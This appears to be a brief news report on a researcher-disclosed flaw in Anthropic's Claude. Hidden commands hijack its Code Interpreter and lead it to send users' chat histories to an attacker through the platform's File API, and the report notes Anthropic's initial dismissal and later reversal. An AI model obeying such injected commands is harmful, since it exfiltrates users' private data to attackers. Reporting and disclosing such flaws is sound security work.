A security researcher has exposed a critical vulnerability in Anthropic’s Claude AI, allowing attackers to steal user data by exploiting the platform's own File API.
The vulnerability enables attackers to use hidden commands to hijack Claude’s Code Interpreter, tricking the AI into sending sensitive data, such as chat histories, directly to the attacker.
Anthropic initially dismissed the report on October 25 but reversed its decision on October 30, acknowledging a “process hiccup”.
The flaw can be exploited through a chained exploit that abuses the platform's own API, highlighting the need for robust security measures in AI systems.
Anthropic's Claude AI has a critical vulnerability that allows data theft via its own API.